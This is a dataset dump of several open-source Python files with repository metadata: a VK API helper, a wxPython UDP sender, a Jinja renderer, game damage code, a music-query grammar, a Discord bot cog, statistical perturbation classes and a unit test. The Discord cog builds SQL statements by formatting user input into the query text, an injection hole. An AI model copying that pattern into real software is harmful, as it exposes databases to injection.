| repo_name (string, 5–92 chars) | path (string, 4–221 chars) | copies (string, 19 classes) | size (string, 4–6 chars) | content (string, 766–896k chars) | license (string, 15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 32–997) | alpha_frac (float64, 0.25–0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5–13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
stepuncius/vk_mutual_friends_finder
|
vk_mutual_friends_finder/get_names_of_users.py
|
1
|
1027
|
import pyvkontakte
from collections import namedtuple
def get_names_of_users(set_of_users):
"""Takes set of user's ids and returns namedtuple
with their names, last names and link on their pages.
Caution: It can't work with more than 1000 people,
it's vkapi's feauture.
"""
VK_ADRESS = "https://vk.com/id"
assert type(set_of_users) == set, "Not set given"
if (len(set_of_users) > 1000):
print("only first thousand of users will be shown.")
api = pyvkontakte.VkontakteApi()
string_of_ids = ",".join(map(str, set_of_users))
response = api.call("users.get", user_ids=string_of_ids, v='5.8')
user = namedtuple(
'user', ['address', 'first_name', 'last_name', 'id'])
result = [user(
address=VK_ADDRESS + str(usr['id']),
id=usr['id'],
first_name=usr['first_name'],
last_name=usr['last_name']
)
for usr in response]
return result
if __name__ == "__main__":
print(get_names_of_users(set((1, 3, 6))))
|
bsd-2-clause
| -5,208,632,784,300,567,000
| 33.233333
| 69
| 0.59591
| false
| 3.16
| false
| false
| false
|
motmot/flytrax
|
motmot/flytrax/trax_udp_sender.py
|
1
|
4075
|
import pkg_resources
import socket, threading
import wx
from wx import xrc
RESFILE = pkg_resources.resource_filename(__name__,"trax_udp_sender.xrc") # trigger extraction
RES = xrc.EmptyXmlResource()
RES.LoadFromString(open(RESFILE).read())
class UDPSender(object):
"""A base class for keeping track of a list of UDP receiver hostnames
Use this class in the following way to get a list of hostnames to send data to:
hosts = udp_sender_instance.get_downstream_hosts()
for host in hosts:
sockobj.sendto( 'hello', host)
"""
def __init__(self,frame):
self.frame = frame
self._remote_host_lock = threading.Lock()
self._remote_host_changed = threading.Event()
self._remote_host_caller = []
self._remote_host_gui = []
self.send_over_ip = threading.Event() # flag toggled by OnEnableSendToIP
self.edit_udp_receivers_dlg = RES.LoadDialog(self.frame,"UDP_RECEIVER_DIALOG")
#####################
ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_ADD")
ctrl.Bind(wx.EVT_BUTTON, self.OnUDPAdd )
ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_EDIT")
wx.EVT_BUTTON(ctrl,ctrl.GetId(),self.OnUDPEdit)
ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_REMOVE")
wx.EVT_BUTTON(ctrl,ctrl.GetId(),self.OnUDPRemove)
#######################
def get_downstream_hosts(self):
if self._remote_host_changed.isSet():
self._remote_host_lock.acquire()
try:
# copy items out of list shared across threads
self._remote_host_caller = self._remote_host_gui
self._remote_host_changed.clear()
finally:
self._remote_host_lock.release()
return self._remote_host_caller
def OnEditUDPReceivers(self,event):
self.edit_udp_receivers_dlg.ShowModal()
def remote_hosts_changed(self):
listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_RECEIVER_LIST")
n = listctrl.GetCount()
self._remote_host_lock.acquire()
try:
self._remote_host_changed.set()
self._remote_host_gui = []
for idx in range(n):
self._remote_host_gui.append( listctrl.GetClientData(idx) )
finally:
self._remote_host_lock.release()
def OnEnableSendToIP(self,event):
widget = event.GetEventObject()
if widget.IsChecked():
self.send_over_ip.set()
else:
self.send_over_ip.clear()
def OnUDPAdd(self,event):
listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_RECEIVER_LIST")
dlg = wx.TextEntryDialog(self.frame,
'Please add the hostname',
)
try:
if dlg.ShowModal() == wx.ID_OK:
hostname = dlg.GetValue()
try:
ip = socket.gethostbyname(hostname)
except socket.gaierror, x:
dlg2 = wx.MessageDialog(dlg,
'error getting IP address: '+str(x),
'FlyTrax: socket error',
wx.OK | wx.ICON_ERROR)
dlg2.ShowModal()
dlg2.Destroy()
else:
remote_host = (ip, 28931)
if hostname != '':
toshow = hostname
else:
toshow = str(ip)
idx = listctrl.Append( toshow )
listctrl.SetClientData(idx,remote_host)
self.remote_hosts_changed()
finally:
dlg.Destroy()
def OnUDPEdit(self,event):
widget = event.GetEventObject()
def OnUDPRemove(self,event):
listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_RECEIVER_LIST")
idx = listctrl.GetSelection()
if idx==wx.NOT_FOUND:
return
remote_host = listctrl.GetClientData(idx)
listctrl.Delete(idx)
self.remote_hosts_changed()
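# --- Usage sketch (not part of the original module; names below are
# hypothetical). A sender loop polls get_downstream_hosts() each cycle;
# the Event/Lock pair above makes the GUI -> sender handoff thread-safe:
#
# sender = UDPSender(frame) # frame: an existing wx.Frame
# sockobj = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# for host in sender.get_downstream_hosts():
# sockobj.sendto('hello', host)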
|
bsd-3-clause
| -2,490,107,922,923,382,000
| 33.533898
| 94
| 0.547485
| false
| 3.929605
| false
| false
| false
|
mmclenna/engine
|
sky/build/template.py
|
1
|
1665
|
#!/usr/bin/env python
#
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Renders a single template file using the Jinja templating engine.'''
import argparse
import sys
import os
import itertools
sys.path.append(os.path.join(os.path.dirname(__file__), '../../third_party'))
import jinja2
from jinja2 import Environment, FileSystemLoader
def make_stamp_file(stamp_path):
# Touch the stamp file, creating it if it does not exist yet.
with open(stamp_path, 'a'):
os.utime(stamp_path, None)
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--template', help='The template file to render')
parser.add_argument('--stamp', help='The template stamp file')
parser.add_argument('--output',
help='The output file to render the template to')
parser.add_argument('vars', metavar='V', nargs='+',
help='A list of key value pairs used as template args')
args = parser.parse_args()
template_file = os.path.abspath(args.template)
if not os.path.isfile(template_file):
print 'Cannot find file at path: ', template_file
return 1
env = jinja2.Environment(loader=FileSystemLoader('/'),
undefined=jinja2.StrictUndefined)
template = env.get_template(template_file)
variables = dict(itertools.izip_longest(*[iter(args.vars)] * 2, fillvalue=''))
output = template.render(variables)
with open(os.path.abspath(args.output), 'wb') as file:
file.write(output)
make_stamp_file(args.stamp)
if __name__ == '__main__':
sys.exit(main())
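# Example invocation (hypothetical paths, for illustration only):
# template.py --template foo.tmpl --stamp foo.stamp --output foo.txt title sky
# The trailing positional args pair up two-by-two via the
# izip_longest(*[iter(args.vars)] * 2) idiom above, giving {'title': 'sky'}.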
|
bsd-3-clause
| 4,045,351,747,393,844,700
| 27.220339
| 80
| 0.679279
| false
| 3.75
| false
| false
| false
|
pyfa-org/eos
|
eos/eve_obj/effect/dmg_dealer/fighter/missiles.py
|
1
|
1879
|
# ==============================================================================
# Copyright (C) 2011 Diego Duclos
# Copyright (C) 2011-2018 Anton Vorobyov
#
# This file is part of Eos.
#
# Eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Eos. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
from eos.const.eve import AttrId
from eos.eve_obj.effect.dmg_dealer.base import DmgDealerEffect
from eos.eve_obj.effect.fighter_effect import FighterEffect
from eos.stats_container import DmgStats
class FighterAbilityMissiles(DmgDealerEffect, FighterEffect):
def get_volley(self, item):
if not self.get_cycles_until_reload(item):
return DmgStats(0, 0, 0, 0)
em = item.attrs.get(AttrId.fighter_ability_missiles_dmg_em, 0)
therm = item.attrs.get(AttrId.fighter_ability_missiles_dmg_therm, 0)
kin = item.attrs.get(AttrId.fighter_ability_missiles_dmg_kin, 0)
expl = item.attrs.get(AttrId.fighter_ability_missiles_dmg_expl, 0)
dmg_mult = item.attrs.get(AttrId.fighter_ability_missiles_dmg_mult, 1)
squad_size = self.get_squad_size(item)
mult = dmg_mult * squad_size
return DmgStats(em, therm, kin, expl, mult)
def get_applied_volley(self, item, tgt_data):
raise NotImplementedError
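# Worked example (illustrative numbers, not game data): with per-missile
# damage attributes (em, therm, kin, expl) = (50, 40, 30, 20), dmg_mult=1.2
# and a squad of 9, get_volley() returns DmgStats(50, 40, 30, 20, 10.8),
# the fifth argument being the multiplier dmg_mult * squad_size = 10.8.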
|
lgpl-3.0
| -1,862,110,855,468,433,400
| 42.697674
| 80
| 0.662586
| false
| 3.403986
| false
| false
| false
|
aaiijmrtt/MUSICALQA
|
code/language.py
|
1
|
3650
|
import pyparsing
literals = lambda literallist: pyparsing.Or([pyparsing.Literal(literal) for literal in literallist])
times = literals(['breve', 'breves', 'semibreve','semibreves', 'minim', 'minims', 'crotchets', 'crotchet', 'quavers', 'quaver', 'semiquaver','semiquavers', 'demisemiquaver', 'demisemiquavers'])
augmentedtimes = literals(['dotted', 'double dotted'])
notes = literals(['B', 'C', 'D', 'E', 'F', 'G', 'Do', 'Re', 'Mi', 'Fa', 'Sol', 'La', 'Ti', 'do', 're', 'mi', 'fa', 'sol', 'la', 'ti'])
augmentednotes = literals(['#', 'b'])
octave = literals(['1', '2', '3', '4', '5', '6', '7'])
instruments = literals(['flute', 'oboe', 'violin', 'violin I', 'violin II', 'timpani', 'double basses', 'cello', 'bass', 'horn', 'piano', 'harpsichord'])
hands = literals(['right', 'left'])
conjunction = literals(['against', 'followed by'])
clef = literals(['bass', 'treble'])
alphanumerals = literals(['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve'])
passage = literals(['homophonic', 'monophonic', 'polyphonic'])
query = pyparsing.And([
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
alphanumerals,
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
pyparsing.Literal('chord'),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.ZeroOrMore(
pyparsing.And([
pyparsing.Group(pyparsing.Optional(augmentedtimes)),
times
])
)
),
pyparsing.Group(
pyparsing.ZeroOrMore(
pyparsing.And([
notes,
pyparsing.Group(pyparsing.Optional(augmentednotes)),
pyparsing.Group(pyparsing.Optional(octave))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
pyparsing.Literal('rest'),
pyparsing.Literal('notes'),
pyparsing.Literal('note'),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
alphanumerals,
pyparsing.Or([
pyparsing.Literal('note'),
pyparsing.Literal('notes')
]),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal("on the word ""),
pyparsing.ZeroOrMore(pyparsing.Word(pyparsing.alphas)),
pyparsing.Literal("!"")
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
passage,
pyparsing.Literal('passage')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Or([
pyparsing.Literal('in bars'),
pyparsing.Literal('in measures')
]),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Or([
pyparsing.Literal('-'),
pyparsing.Literal('to')
]),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in'),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Literal('/'),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Literal('time')
]),
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in the'),
clef,
pyparsing.Literal('clef')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in the'),
instruments
])
)
)
])
compound = pyparsing.And([
query,
pyparsing.ZeroOrMore(
pyparsing.And([
conjunction,
query
])
)
])
def parse(question):
return query.parseString(question).asList()
if __name__ == '__main__':
print parse('dotted crotchet G6')
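    # Further queries the grammar is meant to accept (illustrative, untested):
    # print parse('two dotted crotchets G6 in bars 3 to 5')
    # print parse('homophonic passage in the treble clef in the piano')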
|
mit
| -770,983,344,402,978,700
| 22.101266
| 193
| 0.629041
| false
| 2.853792
| false
| false
| false
|
doshaq/Doshabot
|
cogs/game.py
|
1
|
1090
|
from discord.ext import commands
import sqlite3
class game:
def __init__(self, bot):
self.bot = bot
self.conn = sqlite3.connect('bot_game.db')
self.c = self.conn.cursor()
@commands.command(pass_context=True, no_pm=True)
async def join_game(self, ctx, *keywords):
self.c.execute("INSERT INTO players VALUES('{}','{}','{}','talking_island',1,NULL,'false')".format(str(ctx.message.author),keywords[0],keywords[1]))
self.conn.commit()
await self.bot.say("تم اضافتك للعبه")
@commands.command(pass_context=True,no_pm=True)
async def login(self,ctx):
self.c.execute("UPDATE players SET connect='true' WHERE username ='{}'".format(str(ctx.message.author)))
self.conn.commit()
await self.bot.say("تم الاتصال")
@commands.command(pass_context=True,no_pm=True)
async def logout(self,ctx):
self.c.execute("UPDATE players SET connect='false' WHERE username ='{}'".format(str(ctx.message.author)))
self.conn.commit()
await self.bot.say("تم قطع الاتصال")
def setup(bot):
bot.add_cog(game(bot))
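# Schema assumption (the players table is not created in this cog); it is
# presumed to look roughly like:
# CREATE TABLE players(username TEXT, col1 TEXT, col2 TEXT,
# location TEXT, level INTEGER, extra TEXT, connect TEXT)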
|
gpl-3.0
| 7,310,226,834,112,171,000
| 39.653846
| 150
| 0.700758
| false
| 2.721649
| false
| false
| false
|
tgquintela/pySpatialTools
|
pySpatialTools/utils/perturbations/perturbations.py
|
1
|
23997
|
"""
Perturbations
-------------
Module oriented to perform a perturbation of the system in order to carry out
with statistical testing of models.
The main function of this module is grouping functions which are able to
change the system to other statistically probable options in order to explore
the sample space.
TODO
----
-Aggregation perturbation:
--- Discretization perturbed.
--- Fluctuation of features between borders.
- Fluctuation of borders
--- Fluctuation of edge points
--- Fluctuation over sampling points
"""
import numpy as np
###############################################################################
############################ Location perturbation ############################
###############################################################################
class BasePerturbation:
"""General perturbation. It constains default functions for perturbation
objects.
"""
def _initialization(self):
self.locations_p = None
self.features_p = None
self.relations_p = None
self.discretizations_p = None
self.k_perturb = 1
## Ensure correctness
self.assert_correctness()
def assert_correctness(self):
"""Assert the correct Perturbation class."""
assert('_categorytype' in dir(self))
assert('_perturbtype' in dir(self))
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return i
################## Transformations of the main elements ###################
def apply2locs(self, locations):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray or others
the spatial information to be perturbed.
Returns
-------
locations: np.ndarray or others
the spatial information perturbated.
"""
return locations
def apply2features(self, features):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
return features
def apply2relations(self, relations):
"""Apply perturbation to relations.
Parameters
----------
relations: np.ndarray or others
the relations between elements to be perturbated.
Returns
-------
relations: np.ndarray or others
the relations between elements perturbated.
"""
return relations
def apply2discretizations(self, discretization):
"""Apply perturbation to discretization.
Parameters
----------
discretization: np.ndarray or others
the discretization perturbation.
Returns
-------
discretization: np.ndarray or others
the discretization perturbation.
"""
return discretization
######################### Precomputed applications ########################
def apply2features_ind(self, features, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return self.features_p[i, :, k]
def apply2locs_ind(self, locations, i, k):
"""Apply perturbation to locations individually for precomputed
applications.
Parameters
----------
locations: np.ndarray or others
the spatial information to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the spatial information perturbated.
"""
return self.locations_p[i, :, k]
def apply2relations_ind(self, relations, i, k):
"""For precomputed applications. Apply perturbation to relations.
Parameters
----------
relations: np.ndarray or others
the relations between elements to be perturbated.
Returns
-------
relations: np.ndarray or others
the relations between elements perturbated.
"""
return self.relations_p[i, :, k]
##################### Selfcomputation of main elements ####################
def selfcompute_features(self, features):
pass
def selfcompute_locations(self, locations):
pass
def selfcompute_relations(self, relations):
pass
def selfcompute_discretizations(self, discretizations):
pass
################################# Examples ################################
# def selfcompute_locations(self, locations):
# self.locations_p = self.apply2locs(locations)
#
# def selfcompute_features(self, features):
# self.features_p = self.apply2features(features)
###############################################################################
############################## None perturbation ##############################
###############################################################################
class NonePerturbation(BasePerturbation):
"""None perturbation. Default perturbation which not alters the system."""
_categorytype = "general"
_perturbtype = "none"
def __init__(self, k_perturb=1):
"""The none perturbation, null perturbation where anything happens.
Parameters
----------
k_perturb: int (default=1)
the number of perturbations applied.
"""
self._initialization()
self.k_perturb = k_perturb
###############################################################################
############################ Location perturbation ############################
###############################################################################
class JitterLocations(BasePerturbation):
"""Jitter module to perturbe locations of the system in order of testing
methods.
TODO: Fit some model for infering stds.
"""
_categorytype = "location"
_perturbtype = "jitter_coordinate"
def __init__(self, stds=0, k_perturb=1):
"""The jitter locations apply to locations a jittering perturbation.
Parameters
----------
k_perturb: int (default=1)
the number of perturbations applied.
"""
self._initialization()
self._stds = np.array(stds)
self.k_perturb = k_perturb
def apply2locs(self, locations, k=None):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray
the spatial information to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
locations: np.ndarray
the spatial information perturbated.
"""
## Preparation of ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
locations_p = np.zeros((len(locations), locations.shape[1], len(ks)))
for ik in range(len(ks)):
jitter_d = np.random.random(locations.shape)
locations_pj = np.multiply(self._stds, jitter_d) + locations
locations_p[:, :, ik] = locations_pj
return locations_p
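# Shape sketch (illustrative): three 2-d points, two perturbations.
# jitter = JitterLocations(stds=0.1, k_perturb=2)
# out = jitter.apply2locs(np.random.random((3, 2))) # out.shape == (3, 2, 2)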
class PermutationPerturbationLocations(BasePerturbation):
"""Reindice perturbation for the whole locations."""
_categorytype = "location"
_perturbtype = "element_permutation"
def __init__(self, reindices):
"""Perturbations by permuting locations.
Parameters
----------
reindices: np.ndarray
the reindices to apply permutation perturbations.
"""
self._initialization()
self._format_reindices(reindices)
def _format_reindices(self, reindices):
"""Format reindices.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
if type(reindices) == np.ndarray:
self.k_perturb = reindices.shape[1]
self.reindices = reindices
elif type(reindices) == tuple:
n, k_perturb = reindices
if type(n) == int and type(k_perturb) == int:
self.k_perturb = k_perturb
self.reindices = np.vstack([np.random.permutation(n)
for i in xrange(k_perturb)]).T
def apply2locs(self, locations, k=None):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray
the spatial information to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
locations: np.ndarray
the spatial information perturbated.
"""
## Preparation of ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
##Be coherent with the input location types
ndim = 1 if '__len__' not in dir(locations[0]) else len(locations[0])
if type(locations) == np.ndarray:
locations_p = np.zeros((len(locations), ndim, len(ks)))
for ik in range(len(ks)):
locations_p[:, :, ik] = locations[self.reindices[:, ks[ik]]]
else:
locations_p = [[[]]*len(locations)]*len(ks)
for ik in range(len(ks)):
for i in range(len(locations)):
locations_p[ik][i] = locations[self.reindices[i, ks[ik]]]
return locations_p
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return self.reindices[i, k]
###############################################################################
########################### Permutation perturbation ##########################
###############################################################################
class PermutationPerturbation(BasePerturbation):
"""Reindice perturbation for the whole features variables."""
_categorytype = "feature"
_perturbtype = "element_permutation"
def __init__(self, reindices):
"""Element perturbation for all permutation perturbation.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
self._initialization()
self._format_reindices(reindices)
def _format_reindices(self, reindices):
"""Format reindices for permutation reindices.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
if type(reindices) == np.ndarray:
self.k_perturb = reindices.shape[1]
self.reindices = reindices
elif type(reindices) == tuple:
n, k_perturb = reindices
if type(n) == int and type(k_perturb) == int:
self.k_perturb = k_perturb
self.reindices = np.vstack([np.random.permutation(n)
for i in xrange(k_perturb)]).T
def apply2features(self, features, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
## Assert good features
assert len(features) == len(self.reindices)
## Prepare ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
## Computation of the new perturbed features
sh = len(features), features.shape[1], len(ks)
features_p = np.zeros(sh)
for ik in range(len(ks)):
features_p[:, :, ik] = features[self.reindices[:, ks[ik]], :]
return features_p
def apply2features_ind(self, features, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return features[self.reindices[i, k]]
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return self.reindices[i, k]
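# Sketch (illustrative): permutation via an explicit (n, k) reindex matrix.
# reind = np.vstack([np.random.permutation(5) for _ in range(3)]).T # (5, 3)
# perm = PermutationPerturbation(reind)
# feats = perm.apply2features(np.arange(10.).reshape(5, 2)) # (5, 2, 3)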
class PermutationPerturbationGeneration(PermutationPerturbation):
"""Reindice perturbation for the whole features variables."""
def __init__(self, n, m=1, seed=None):
"""Element perturbation for all permutation perturbation.
Parameters
----------
n: int
the size of the sample to create the reindices.
m: int (default=1)
the number of permutations we want to generate.
seed: int (default=None)
the seed to initialize and create the same reindices.
"""
self._initialization()
if seed is not None:
np.random.seed(seed)
self._format_reindices((n, m))
class PartialPermutationPerturbationGeneration(PermutationPerturbation):
"""Reindice perturbation for the whole features variables. It can control
the proportion of the whole sample is going to be permuted.
"""
def __init__(self, n, rate_pert=1., m=1, seed=None):
"""Element perturbation for all permutation perturbation.
Parameters
----------
n: int
the size of the sample to create the reindices.
m: int (default=1)
the number of permutations we want to generate.
seed: int (default=None)
the seed to initialize and create the same reindices.
"""
self._initialization()
if seed is not None:
np.random.seed(seed)
if rate_pert == 1.:
self._format_reindices((n, m))
else:
n_sample = int(n*rate_pert)
indices = np.random.permutation(n)[:n_sample]
reindices = np.vstack([np.arange(n) for i in xrange(m)]).T
reindices[indices] = np.vstack([np.random.permutation(n_sample)
for i in xrange(m)]).T
self.k_perturb = m
self.reindices = reindices
###############################################################################
############################# Element perturbation ############################
###############################################################################
## TODO:
class MixedFeaturePertubation(BasePerturbation):
"""An individual-column-created perturbation of individual elements."""
_categorytype = "feature"
_perturbtype = "element_mixed"
def __init__(self, perturbations):
"""The MixedFeaturePertubation is the application of different
perturbations to features.
perturbations: list
the list of pst.BasePerturbation objects.
"""
msg = "Perturbations is not a list of individual perturbation methods."
self._initialization()
if type(perturbations) != list:
raise TypeError(msg)
try:
self.typefeats = [p._perturbtype for p in perturbations]
k_perturbs = [p.k_perturb for p in perturbations]
assert all([k == k_perturbs[0] for k in k_perturbs])
self.k_perturb = k_perturbs[0]
self.perturbations = perturbations
except:
raise TypeError(msg)
def apply2features(self, features):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
assert features.shape[1] == len(self.perturbations)
## Apply individual perturbation for each features
features_p, n = [], len(features)
k_pos = list(range(self.k_perturb))
for i in range(len(self.perturbations)):
features_p_k =\
self.perturbations[i].apply2features(features[:, [i]], k_pos)
features_p_k = features_p_k.reshape((n, 1, self.k_perturb))
features_p.append(features_p_k)
features_p = np.concatenate(features_p, axis=1)
return features_p
########################### Individual perturbation ###########################
###############################################################################
class DiscreteIndPerturbation(BasePerturbation):
"""Discrete perturbation of a discrete feature variable."""
_categorytype = "feature"
_perturbtype = "discrete"
def __init__(self, probs):
"""The discrete individual perturbation to a feature variable.
Parameters
----------
probs: np.ndarray
the probabilities to change from a value of a category to another
value.
"""
self._initialization()
if not np.all(np.isclose(probs.sum(1), 1)):
raise TypeError("Not correct probs input: every row must sum to 1.")
if probs.shape[0] != probs.shape[1]:
raise IndexError("Probs is not a square matrix.")
self.probs = probs.cumsum(1)
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
## Prepare loop
categories = np.unique(feature)
if len(categories) != len(self.probs):
msg = "Not matching dimension between probs and features."
raise IndexError(msg)
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
## Compute each change
feature_p = np.zeros((len(feature), len(k)))
# Columns of feature_p are positional; k may hold arbitrary indices.
for ind, i_k in enumerate(k):
for i in xrange(len(feature)):
r = np.random.random()
idx = np.where(feature[i] == categories)[0][0]
idx2 = np.where(self.probs[idx] > r)[0][0]
feature_p[i, ind] = categories[idx2]
return feature_p
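# Illustrative transition matrix for two categories that keeps each value
# with probability 0.9 and flips it with probability 0.1:
# pert = DiscreteIndPerturbation(np.array([[0.9, 0.1], [0.1, 0.9]]))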
class ContiniousIndPerturbation(BasePerturbation):
"""Continious perturbation for an individual feature variable."""
_categorytype = "feature"
_perturbtype = "continious"
def __init__(self, pstd):
"""The continious individual perturbation to a feature variable.
Parameters
----------
pstd: float
the dispersion measure of the jittering.
"""
self._initialization()
self.pstd = pstd
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
feature_p = np.zeros((len(feature), len(k)))
for ind, i_k in enumerate(k): # columns of feature_p are positional
jitter_d = np.random.random(len(feature))
feature_p[:, ind] = np.multiply(self.pstd, jitter_d)
return feature_p
class PermutationIndPerturbation(BasePerturbation):
"""Reindice perturbation for an individual feature variable."""
_categorytype = "feature"
_perturbtype = "permutation_ind"
def __init__(self, reindices=None):
"""Individual feature perturbation.
Parameters
----------
reindices: np.ndarray (default=None)
the reindices to apply permutation perturbations.
"""
self._initialization()
if type(reindices) == np.ndarray:
self.reindices = reindices
self.k_perturb = reindices.shape[1]
else:
raise TypeError("Incorrect reindices.")
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
feature_p = np.zeros((len(feature), len(k)))
for ind, i_k in enumerate(k): # columns of feature_p are positional
feature_p[:, [ind]] = feature[self.reindices[:, i_k]]
return feature_p
def apply2features_ind(self, feature, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return feature[self.reindices[i, k]]
###############################################################################
########################### Aggregation perturbation ##########################
###############################################################################
class JitterRelationsPerturbation(BasePerturbation):
"""Jitter module to perturbe relations of the system in order of testing
methods.
"""
_categorytype = "relations"
|
mit
| -2,054,015,461,161,471,700
| 30.124514
| 79
| 0.535817
| false
| 4.616583
| false
| false
| false
|
mattvonrocketstein/smash
|
tests/units/test_utils.py
|
1
|
1228
|
""" tests/test_utils
"""
import os
from smashlib.testing import TestCase, hijack_ipython_module, main
from smashlib.plugins.smash_completer import SmashCompleter, smash_env_complete
from smashlib.overrides import SmashTerminalInteractiveShell
from mock import Mock
hijack_ipython_module()
from IPython.testing.tools import default_config
from IPython.core.completerlib import TryNext
from IPython.testing.globalipapp import get_ipython
from smashlib.util import bash
ffile = os.path.join(os.path.dirname(__file__),
'function.sh')
class TestUtils(TestCase):
def setUp(self):
return # NOTE: short-circuits the rest of the setup; the mocks below are kept but currently unused
self.shell = Mock()
self.config = default_config()
self.shell.config = self.config
self.plugin = SmashCompleter(self.shell)
self.event = Mock()
def test_get_functions_from_file(self):
self.assertTrue(os.path.exists(ffile))
self.assertEqual(
['simple_function'],
bash.get_functions_from_file(ffile))
def test_run_function_from_file(self):
self.assertEqual(
bash.run_function_from_file(
'simple_function', ffile),
['simple bash function'])
if __name__ == '__main__':
main()
|
mit
| -5,957,990,363,373,603,000
| 31.315789
| 79
